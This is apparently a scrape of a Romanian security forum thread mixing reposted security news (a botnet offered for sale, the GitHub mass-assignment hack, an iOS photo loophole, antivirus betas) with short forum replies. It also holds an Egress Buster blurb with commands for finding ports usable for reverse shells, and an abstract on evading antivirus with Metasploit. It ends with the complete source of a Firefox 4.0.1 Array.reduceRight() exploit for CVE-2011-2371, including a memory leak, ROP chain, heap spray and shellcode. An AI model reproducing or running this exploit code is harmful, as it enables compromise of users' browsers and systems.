Nytro

THOR : Another P2P Botnet in development with extra stealth features POSTED BY THN REPORTER ON 3/06/2012 07:59:00 PM The research community is now focusing on the integration of peer-to-peer (P2P) concepts as incremental improvements to distributed malicious software networks (now generically referred to as botnets). Because “botnets” can be used for illicit ?nancial gain,they have become quite popular in recent Internet attacks. A “botnet” is a network of computers that are compromised and controlled by an attacker. Each computer is infected witha malicious program called a “bot”, which actively communicates with other bots in the botnet or with several “botcontrollers” to receive commands from the botnet owner. Attackers maintain complete control of their botnets, andcan conduct Distributed Denial-of-Service (DDoS) attacks,email spamming, keylogging, abusing online advertisements, spreading new malware, etc. However, the first botnets that use peer-to-peer (P2P) networks for remote control of the compromised machines appeared in the wild recently. This new bot has a different code base, it uses the same spreading strategy and also seems to maintain a multi-relay (or peer-to-peer) infrastructure just like its predecessor. Thor is a decentralised P2P botnet , Coded in C / C++ & Developed by "TheGrimReap3r" that has been in development for some time now and is almost ready to go out on sale.The botnet itself has no central command point, so it will be very difficult to shut down, also, very difficult to track where commands are coming from, because all the nodes pass them on. Thor uses DLL injection, IAT hooking, ring3 rootkit amongst other things to hide. One more interesting Feature that It have it's own module system so you can write your own modules with our easy API system. It include peer to peer communication uses 256-AES encryption with random key generation at each startup. Thor works on Win 2000+, Win XP SP0/SP1/SP2/SP3, Win Vista SP0/SP1/SP2, Win 7 SP0/SP1 and Support x86 and x64 systems. The Developers of Thor going to sale this Botnet openly in underground market and various hacking forums at $8000, the package without modules and the expected modules that anyone can buy will be: advanced botkiller, DDoS, formgrabber, keylogger/password stealer and mass mailer. Sursa: THOR : Another P2P Botnet in development with extra stealth features | The Hacker News (THN)

Cred ca se poate folosi cu sysenter (daca se obtine acces la stiva) din user mode pentru privilegii kernel-mode.

GitHub hacked with Ruby on Rails public key vulnerability Posted by THN Reporter On 3/06/2012 07:07:00 AM Github, the service that many professional programmers use to store their work and collaborate on coding, was hacked over the weekend. A young Russian developer Egor Homakov exploited a gaping vulnerability in GitHub that allowed him (or anyone else with basic hacker know-how) to gain administrator access to projects such as Ruby on Rails, Linux, and millions of others. When Github saw what happened, they suspended Homakov’s account, which created a firestorm of protest. A blog post entitled, Github, You Have Let Us All Down . Github has succumbed to a public key vulnerability in Ruby on Rails allowing a user administrator access to the popular Rails Git. Homakov's actions were relatively simple - he merely uploaded his public key to the repository so Git thought he was an approved administrator of that project. This would not only entitle Homakov to commit files but he could effectively wipe the entire project and its history clean. "The root cause of the vulnerability was a failure to properly check incoming form parameters, a problem known as the mass-assignment vulnerability," GitHub co-founder Tom Preston-Werner wrote in a blog post. "Two days ago he responsibly disclosed a security vulnerability to us and we worked with him to fix it in a timely fashion. Today, he found and exploited the public key form update vulnerability without responsible disclosure," Preston-Werner said, explaining that this had meant Homakov had broken GitHub's terms and conditions. Github is used by a number of high-profile projects including the Linux kernel. Homakev's actions were to exploit a well known weakness of Ruby on Rails and questions might be asked as to why Github's administrators did not block such an attack sooner. Moving forward, GitHub has apologized for obfuscating the how white hat hackers should disclose security vulnerabilities and set up a new help page that clearly lists how to report issues. Sursa: GitHub hacked with Ruby on Rails public key vulnerability | The Hacker News (THN)

[h=1]Avira Free Mac Security Beta – Antivirus gratuit pentru MAC adresat companiilor si utilizatorilor casnici[/h] By Radu FaraVirusi(com) on March 5, 2012 Avira lanseaza versiunea Beta pentru produsul lor de securitate adresat sistemelor Mac OS. Se numeste Avira Free Mac Security si va fi oferit gratuit atat pentru companii, cat si pentru utilizatorii casnici. Pentru a descarca Avira Free Mac Security BETA accesati link-ul: http://betacenter.avira.com/files/download.aspx/avira_mac_security_1.0.0.50-2.pkg Pentru alte detalii despre produs, accesati blogul Avira: Avira Free Mac Security – Beta now available | Avira – TechBlog Sursa: Avira Free Mac Security Beta – Antivirus gratuit pentru MAC adresat companiilor si utilizatorilor casnici

[h=1]Descarca Kaspersky Internet Security 2013 – Testarea Beta a inceput[/h] By Radu FaraVirusi(com) on March 5, 2012 Cei de la Kaspersky au lansat versiunea 2013 a celebrului produs de securitate Kaspersky Internet Security. Momentan este in stadiul de testare BETA si nu avem o lista a modificarilor in mod oficial. Interfata grafica a ramas si va ramane pana la final aceeasi ca in versiunea 2012, cu mici modificari de “nuanta”. Iata mai jos primele poze si la final, link-urile pentru descarcare: Pentru a descarca Kaspersky Internet Security 2013 Beta accesati link-ul: http://special.kaspersky-labs.com/3A8VCJNYOJN7JYU8HFUW/kis13.0.0.2292en.exe Pentru raportarea problemelor aparute in timpul evaluarii sau pentru alte informatii puteti vizita forumul oficial: Kaspersky Lab Forum -> KIS\KAV 2013 Sursa: Descarca Kaspersky Internet Security 2013 – Testarea Beta a inceput

Javascript != Node.js...

ICMP, TCP, UDP, e irelevant. Problema e simpla: cum faci o conexiune DIN BROWSER folosind un anume protocol, indiferent care? Cat despre ICMP, are alte scopuri, ca sa nu mai spun ca e necesar un raw socket pentru crearea sa (stiu ca stii astea), ceea ce inseamna rularea "programului" ca Administrator/root. Apoi, de multe ori, in ziua de azi, conexiunile la Internet nu dispun de o adresa IP publica UNICA, si nici nu cred ca se pune problema de port forwarding pe routerele ISP-urilor. Pe scurt, browser-ul nu este facut pentru asa ceva. Singura solutie posibila poate fi The WebSocket API dar nu stiu cum vei reusi sa pui un WebSocket in stare de "listening".

Nu se poate.

Salut, nu poti face nimic, nu functioneaza decat daca formularul (pagina din iframe) se afla pe acelasi server. Este o limitare impusa inca de pe vremea Netscape, de multi ani. Sa fim seriosi, daca se putea asta, se puteau face multe "lucruri". Sau, se poate face ceva, desigur, daca ai un XSS in site-ul respectiv.

Pacat ca sunt session cookies (fara 'expire'). Stiti voi ce sunt alea si cat sunt valide.

E scris cu picioarele, o gramada de porcarii, nu e tocmai o sursa din care sa ai ce invata. PS: Linux pe 64 de biti?

Spune si care sunt diferentele intre "union" si "union all", intre "into outfile" si "into dumpfile", cum verifici privilegiile, ce faci daca directorul nu e writeable, sau nu ai calea directa, de ce e acel "+" la final, ce inseamna pentru browser, de ce folosesti hex la Load File cand la codul PHP se vede ca nu se face escape la ghilimea, ce se poate face daca functia system e in lista de "disabled_functions" si... de ce folosesti Internet Explorer?

Ce penal

BackTrack 5 R2 Released

1. Remote Desktop Protocol - Wikipedia, the free encyclopedia 2. Vezi link-ul de la pasul 1, intrebarea e irationala, RDP e un protocol 3. Simple Mail Transfer Protocol - Wikipedia, the free encyclopedia 4. Cred ca vrei sa spui Server SMTP, server care implementeaza PROTOCOLUL SMTP 5. Poti trimite mail-uri PS: Eu ti-am raspuns la intrebari, pentru cei care se ocupa cu asa ceva, acesti termeni au alte conotatii. Nu te astepta la raspunsuri relevante de la aceste persoane, pot sa jur ca nu exista aici 2-3 persoane care sa citeasca despre protocolul SMTP sau RDP, ei doar folosesc niste programe chioare, nu inteleg cum functioneaza protocolul in sine, e ca si cum ai intra intr-un bloc si ai incerca cateva chei la anumite usi, nu conteaza ca nu stii cum functioneaza acea usa, tu doar incerci, si daca ai noroc, te poti lauda (desi nu ai cu ce) ca esti "hacker" si ca ai spart servere (spun asta pentru ca aceleasi principii se aplica si la SSH, care da, si el tot un protocol este). NB: Communications protocol - Wikipedia, the free encyclopedia Fii tu unul dintre acele persoane care cunoaste sistemul de inchidere al unei usi, daca tot vrei sa fii un... "deschizator de usi".

Traducere de cacat, "seized" inseamna "confiscat" in germana.

[h=1]Loophole in iOS Allows Developers Access to Users’ Photos[/h]February 29, 2012, 2:29PM by Christopher Brook A recently discovered hole in Apple's iOS allows third-party developers access to users’ iPhone, iPad or iPod Touch photos by exploiting the device’s location data, according to a report from the New York Times’ Nick Bilton on the Bits blog yesterday. The loophole lies in the way that applications use certain photo location data. Assuming an iPhone user approves any app that accesses the location data of photos, the app’s developers will be able to capture any of the users’ images while that app is open. The Times had an unnamed developer create a proof of concept application app to do just this, according to the blog post. The app, called PhotoSpy, was never submitted to the App Store for approval but asked users for access to location data. After granting it, the app began transferring photos and location data from the phone to a remote server. Apple first allowed apps access to photo libraries in 2010 with the fourth build of their operating system. The move was intended to allow photo apps better access to let users share and edit photos. While Apple didn't immediately respond to a request for comment on Wednesday, they have gone on record regarding any apps that may use a users' contact information without notification: “Apps that collect or transmit a user’s contact data without their prior permission are in violation of our guidelines,” Apple's Tom Neumayr told the Wall Street Journal's AllThingsD blog earlier this month. The news comes two weeks after it was discovered that Twitter and other apps were uploading users’ contact lists to remote servers without their knowing. Path, a social network that encourages users to share photos and message each other was criticized earlier this month after a researcher found the company’s app uploading users’ address books to the company without notification. Sursa: Loophole in iOS Allows Developers Access to Users’ Photos | threatpost

A walk through the expo at RSA Conference 2012, part two Posted on 29 February 2012. The expo floor at this year's RSA Conference is bigger than ever, with numerous companies exhibiting for the first time. Here's another look at the show floor, with more interesting booths. For up-to-date conference news and photos check out our dedicated coverage page for RSA Conference 2012. The extensive EMC booth dominates one of the rows. Sensage in the middle of a discussion. Presentation in progress at the Wave Safend booth. The Tenable Security space. FireHost briefing potential customers. The busy Arbor Networks booth. Something grabbed this gentleman's attention. The Check Point booth. Sursa: A walk through the expo at RSA Conference 2012, part two

[h=1]Roboscan Internet Security – Suita de securitate gratuita cu motor dual: BitDefender si Tera[/h] By Radu FaraVirusi(com) on February 29, 2012 O noua suita de securitate gratuita isi face aparitia pe piata Roboscan Internet Security Free. In ceea ce priveste componenta Antivirus foloseste doua motoare: BitDefender si Tera. Astfel, puteti avea protectie de top impotriva malware-ului de orice tip, alaturi de un firewall decent. La o prima impresie, are un consum foarte mic de resurse: 18 MB RAM, iar detectia este una foarte buna. Astfel, se constituie intr-un competitor serios pentru celelalte produse gratuite de securitate deja existente pe piata. Iata mai jos cateva screenshot-uri, urmate de link-ul de descarcare. Pentru a-l descarca accesati link-ul: Roboscan Sursa: Roboscan Internet Security – Suita de securitate gratuita cu motor dual: BitDefender si Tera

[h=4]Hitb2011Kul - Mobile Malware Analysis[/h] Description: Mobile Malware Analysis Sursa: Hitb2011Kul - Mobile Malware Analysis

[h=4]Hitb2011Kul - Reverse Engineering Android Malware[/h] Description: Reverse Engineering Android Malware Android is growing at such an explosive rate, and users are storing an increasing amount of important data on their mobile phones, thus the platform is an attractive target for malware author. Malware author are aiming for users of Google's Android mobile operating system with a malicious application that harvests personal information, controlling the system and sends it to a remote server. By utilizing SMS toll fraud; malware author will also steal money from infected mobile phone. Malware infection on Android platform is going to be interesting in future (it's happening now!). Thus, reversing Android Malware (Droid-ware) is interesting challenge to address. Malware analysis can be performed using two approaches, which is Dynamic Analysis and Dead-Listing Analysis (Reverse Engineering). Reverse engineering is a vitally important skill for today's expert security professional. In this presentation, we'll focus on the later approach to analyze Android Malware. In this talk, the speaker will discuss on recent progress on Android malware scene. The speaker will provide details on few recent Android Malware samples. The speaker will also discuss on technical analysis on malicious Android applications by using reversing engineering approach. The analysis parts will focus on dissecting obfuscation such as encryption, string optimizing and generic obfuscation techniques applied inside Android Malware. The challenges when dealing with reversing Android Malware will be addressed as well. About Mahmud Ab Rahman Mahmud Ab Rahman currently works as Information Security Specialist for Malaysia Computer Emergency and Response Team (MyCERT) under umbrella of CyberSecurity Malaysia. Prior to that, he worked as an Intrusion Analyst at MyCERT department. His education background comprises of Master Degree in Computer Science from National University of Malaysia in 2006. Prior to that, he obtained a Degree in Computer Science from the same university. Mahmud has been involved in the computer security field for over 5 years. His area of focus and interest is network security, honeynet, botnet monitoring, and malware analysis. He also engages in several large scale penetration-testing exercises and to provide solutions for any vulnerability detected. Moreover, he is recognized for conducting numbers of training for organizations to talk on topics ranging from introduction to advanced security courses. He is a occasional speaker at conferences such as FIRST AGM, FIRST TC,Honeynet Annual Workshop and Infosec.MY. He currently certified for SANS's GPEN (gold) and GREM. Sursa: Hitb2011Kul - Reverse Engineering Android Malware

[h=1]First beta for GNOME 3.4[/h]27 February 2012, 12:19 The GNOME project has released the first beta of GNOME 3.4, officially labelled GNOME 3.3.90 beta. This marks the development of the desktop environment moving into the home stretch and there should be no major changes from this point on because, among other things, the feature freeze was put in place a week ago. The first beta implements a range of improvements to the core components and applications that make up the GNOME desktop. For example, the updated version of NetworkManager includes basic support for VLANs and bonded network ports. The GNOME shell and screensaver now use systemd to obtain information on active users of the system and their input devices rather than, as at present, using ConsoleKit. The previously developed Redo function in Nautilus, the streamlined web browser, and the new virtualisation and remote desktop software, GNOME Boxes, are also part of the beta. According to the schedule, GNOME 3.4 is scheduled for release on 28 March. Before then, another beta and a release candidate will appear. (djwm) Sursa: First beta for GNOME 3.4 - The H Open Source: News and Features

[h=2]New tool release – “Egress Buster” – Find outbound ports[/h]February 29th, 2012 A friend was recently on a penetration test and needed a port on the outside. I haven’t found any decent tools out there for finding what ports are allowed outbound to help with reverse shells and stuff like that so I wrote one real quick. Note that this was written in about 15 minutes and the code can absolutely be improved. I’ll probably go back and clean it up sometime. There are some limitations, for one, operating systems in general start to puke when you generate over a 1000 listeners, so you will need to test a 1000 at at time. Good news is the socket handlers are multi-threaded so you can cycle through about a 1000 ports in well under a minute. Here’s the general concept: You are on the inside network somehow and need to find what ports are allowed out to the Internet. There’s two main files/components – egressbuster and egress_listener. Egressbuster connects out on whatever ports you specify and tries to connect to an Internet facing computer thats running egress_listener. Very simple to run: On victim: egressbuster.exe example: egressbuster.exe 208.1.1.1 1-1000 In the above example, we specify a low port range and high port range, egressbuster will attempt to connect from port 1 to 1000 outbound to wherever the reverse_listener is. The listener: python egress_listener.py example: python egress_listener.py 1-1000 In the above example, we just specify what ranges we need to listen to. In the above example we listen from 1 to 1000 for incoming connections. When a connection is established, this is what you'll see on the listener side. 192.168.235.131 connected on port: 170 192.168.235.131 connected on port: 171 192.168.235.131 connected on port: 172 192.168.235.131 connected on port: 173 192.168.235.131 connected on port: 174 192.168.235.131 connected on port: 175 192.168.235.131 connected on port: 176 192.168.235.131 connected on port: 177 192.168.235.131 connected on port: 178 If your interested, download the byte compiled code and the python source here. Download: https://www.secmaniac.com/files/egressbuster.zip Sursa: https://www.secmaniac.com/blog/2012/02/29/new-tool-release-egress-buster-find-outbound-ports/

Metasploit - Low Level View Saad Talaat (saadtalaat _ gmail.com) Forward Abstract: for the past decade (almost) Metasploit have been number one pentesting tool. A lot of plug-ins have been developed specially for it. However, the key-point of this paper is to discuss metasploit framework as a code injector and payload encoder. Another key-point of this paper is malware different forms and how to avoid anti-viruses which have been a pain for pentesters lately. And how exactly anti-malware software work. Introduction Evading anti-viruses have been a painful issue for pentesters for years. On the other hand a birth of an anti-virus evading technique means blackhats and skiddies will have another way to hack without being detected. Over the years metasploit framework have been working in one technique on evading anti-viruses which is encoding. For a year or two some encoding techniques worked fine. Nowadays It's nearly impossible to get encoded payload that evades anti-virus from metasploit's encoders no matter how many iterations you do. Download: [URL]http://cdn01.exploit-db.com/wp-content/themes/exploit/docs/18532.pdf[/URL]

Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit <!--Full Exploit Code: http://www.exploit-db.com/sploits/18531.zip PoC exploit for CVE-2011-2371 tested against Firefox 4.0.1 md5 of mozjs.dll: 5d7ffcc9deb5bb08417ceae51d2afed4 change constants to switch between w7/xp. see my blog if you want to know how this works. http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/ p_k twitter.com/pa_kt gdtr.wordpress.com --> <html> <script src="jspack.js"></script> <script> function hex(x){ var y = x.toString(16); y = "0x"+y; return y; } function itoa(i) { return String.fromCharCode(i); } // n - length in bytes (1 unicode char = 2 bytes) function puff(x, n){ while(x.length < n) x += x; return x.substring(0,n); } function arr2hex(tab){ var s = ""; for(var i in tab){ x = tab[i]; x = x.toString(16); if(x.length<2) x = "0"+x; s += x + " "; } return s; } function arr2ascii(tab){ var s = "" for(var i in tab){ x = tab[i]; if(0x20 <= x && x<=0x7f){ y = itoa(x); } else{ y = "."; } s += y; } return s; } function xchg(d,i,j){ t = d[i]; d[i] = d[j]; d[j] = t; } function bswap(d){ xchg(d, 0, 3); xchg(d, 1, 2); } function nicer(tab){ jsp = new JSPack(); res = []; for(var i in tab){ x = tab[i]; t = jsp.Pack("d", [x]); d1 = t.slice(0, 4); d2 = t.slice(4, 8); bswap(d1); bswap(d2); t = [d1,d2]; res = res.concat(t); } res = res.reverse(); return res; } function dw2int(d){ n = 0; for(var i=0;i<4;i++){ n *= 256; n += d[3-i]; } return n; } function convert(tab){ o = s = v = ""; for(var i in tab){ d = tab[i]; s += arr2hex(d); v += arr2ascii(d); if((parseInt(i)+1)%4==0){ o += s + " | " + v + "\n"; s = ""; v = ""; } } return o; } function check_pair(d1, d2){ var n1 = dw2int(d1); var n2 = dw2int(d2); if(n2-n1 == 0x304) return true; return false; } function find_mozjs_base(tab){ var n1 = 0; for(var i=0;i<tab.length-4;i++){ d1 = tab[i]; d2 = tab[i+1]; if(check_pair(d1,d2)){ n1 = dw2int(d1); n1 = n1 - 0x3cac; //n1 = mozjs .data n1 = n1 - 0x1B2000; //n1 = mozjs base break; } } return n1; } function d2u(dword){ var uni = String.fromCharCode(dword & 0xFFFF); uni += String.fromCharCode(dword>>16); return uni; } function odd_d2u(d1, d2){ uni = String.fromCharCode((d1&0xFF)<<8); uni += String.fromCharCode((d1>>8)&0xFFFF); uni += String.fromCharCode((d1>>24)+((d2 & 0xFF)<<8)); //1+1<<8 == 512 in JS T_T uni += String.fromCharCode((d2>>8)&0xFFFF); uni += String.fromCharCode(d2>>24); return uni; } // generated with mona.py function rop_chain(mozjs_base){ var arr = [ mozjs_base + 0x000c96e6, // POP EAX // RETN [mozjs.dll] mozjs_base + 0x0015d054, // ptr to &VirtualAlloc() [IAT mozjs.dll] mozjs_base + 0x00028510, // MOV EAX,DWORD PTR DS:[EAX] // RETN [mozjs.dll] mozjs_base + 0x0014293c, // XCHG EAX,ESI // RETN [mozjs.dll] mozjs_base + 0x0014d00d, // POP EBP // RETN [mozjs.dll] mozjs_base + 0x000d7ee2, // & push esp // ret 04 [mozjs.dll] mozjs_base + 0x000be327, // POP EBX // RETN [mozjs.dll] 0x00000001, // 0x00000001-> ebx mozjs_base + 0x0004f422, // POP EDX // RETN [mozjs.dll] 0x00001000, // 0x00001000-> edx mozjs_base + 0x000b1421, // POP ECX // RETN [mozjs.dll] 0x00000040, // 0x00000040-> ecx mozjs_base + 0x000062e3, // POP EDI // RETN [mozjs.dll] mozjs_base + 0x0000f005, // RETN (ROP NOP) [mozjs.dll] mozjs_base + 0x000652f0, // POP EAX // RETN [mozjs.dll] 0x90909090, // nop mozjs_base + 0x001372bd // PUSHAD // RETN [mozjs.dll] ]; return arr; } function tab2uni(tab){ var uni = "" for(var i=0;i<tab.length;i++){ uni += d2u(tab[i]); } return uni; } function spray(mozjs_base, h1_s, hsize) { function rva2va(addr) { return addr+mozjs_base; } function rva2d(addr) { return d2u(rva2va(addr)); } var align = 0x100000; var tab_offset = 0x1000; var TYPE_OBJECT = "%u0007%uffff"; var pivot_rva = 0x1a21c; // 0x68e7a21c : # ADD EBP,EBX # PUSH DS # POP EDI # POP ESI # POP EBX # MOV ESP,EBP # POP EBP # RETN var mov_esp_ebp_rva = 0x1a222; // mov esp, ebp # pop ebp # ret var h2_s = h1_s + hsize; var h2_middle = (h2_s + hsize/2) & (~(align-1)); //align //mov eax,dword ptr [edi+64h] ;edi=[h2_ptr+4], later: call eax var h2_ptr = h2_middle + tab_offset; var off1 = h2_ptr; var off2 = h2_ptr-0x64; var v1 = d2u(off1); var h1_fill = unescape(v1+TYPE_OBJECT); var foo = puff(h1_fill, 0x4000); var h1_spray = foo.substring(0,(0x4000/2)-2); var pivot_va = rva2va(pivot_rva); pivot_va = d2u(pivot_va); off2 = d2u(off2); var new_ebp = h2_ptr+18; var mov_esp_ebp_va = rva2va(mov_esp_ebp_rva); var set_esp = odd_d2u(new_ebp, mov_esp_ebp_va); var rop = tab2uni(rop_chain(mozjs_base)); //shellcode by skylined var msgbox_shellcode = "%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%ue367%u8bec%u207b%uef01%u7c8b%ufc8f%uef01%uc031%u3299%u6617%ucac1%uae01%uf775%u8166%u2afa%u74b6%u6609%ufa81%u1aaa%udbe0%uc575%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u8597%u74f6%u6812%u3233%u2020%u7568%u6573%u5472%ud5ff%u3195%uebf6%u56a3%u3168%u0021%u6800%u322d%u3733%u3268%u3130%u6831%u7663%u2d65%u8754%u2404%u5050%uff56%uccd5"; var x = unescape(pivot_va+off2+set_esp+"%u1111%u2222"+rop+msgbox_shellcode); x = puff(x, 0x4000); var h2_spray = x.substring(0,(0x4000/2)-2); var spray_tab = new Array(); for (i=0;i<0x1000;i++){ spray_tab[i] = h1_spray+"1"; spray_tab[i].indexOf("zzz"); } for (i=0x1000;i<0x2000;i++){ spray_tab[i] = h2_spray+"2"; spray_tab[i].indexOf("zzz"); } } var exploit_func = function bleh(prev, current, index, array) { //boom = typeof current; current[4] = 1; // add ebp, ebx, where ebx=2*4+1=9 //throw "up"; } function trigger(func, arr_len){ xyz.length = arr_len; try{ xyz.reduceRight(func,1,2,3); } catch(e){ } } function leak(){ var CHUNK_SIZE = 0x1000; var leak_arr_len = 0xffffffff; mem = []; count = 0; var leak_func = function bleh(prev, current, index, array) { if(typeof current == "number"){ mem.push(current); } count += 1; if(count>=CHUNK_SIZE/8){ throw "lol"; } } function dump_mem(leak_f, arr_len){ var dump = document.getElementById("dump"); var mozjs_base = 0; for(var i=0;;i++){ mem = []; count = 0; trigger(leak_f, arr_len); mem = nicer(mem); s = convert(mem); dump.innerHTML = s; //alert("leaked bytes: "+hex(mem.length*4)); mozjs_base = find_mozjs_base(mem); //alert("mozjs base: "+hex(mozjs_base)); if(mozjs_base != 0){ break; } } return mozjs_base; } var base = dump_mem(leak_func, leak_arr_len); return base; } function go(){ //var arr_ptr = 0x05000000; //(xp sp3) //var h1_s = 0x05b00000; //var h2_e = 0x0fb00000; var arr_ptr = 0x0b000000; //w7 var h1_s = 0x0b500000; var h2_e = 0x16e00000; var size = h2_e-h1_s; var hsize = size/2; var h1_middle = h1_s+hsize/2; var exp_arr_len = (h1_middle - arr_ptr)/8 + 0x80000000; var mozjs_base = leak(); spray(mozjs_base, h1_s, hsize); alert("ready"); while(1){ trigger(exploit_func, exp_arr_len); exp_arr_len -= 0x500; } } // globals var xyz = new Array(); </script> <body> <input type="button" value="go" onclick="go()" /> <pre id="dump"> </pre> </body> </html> Sursa: Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit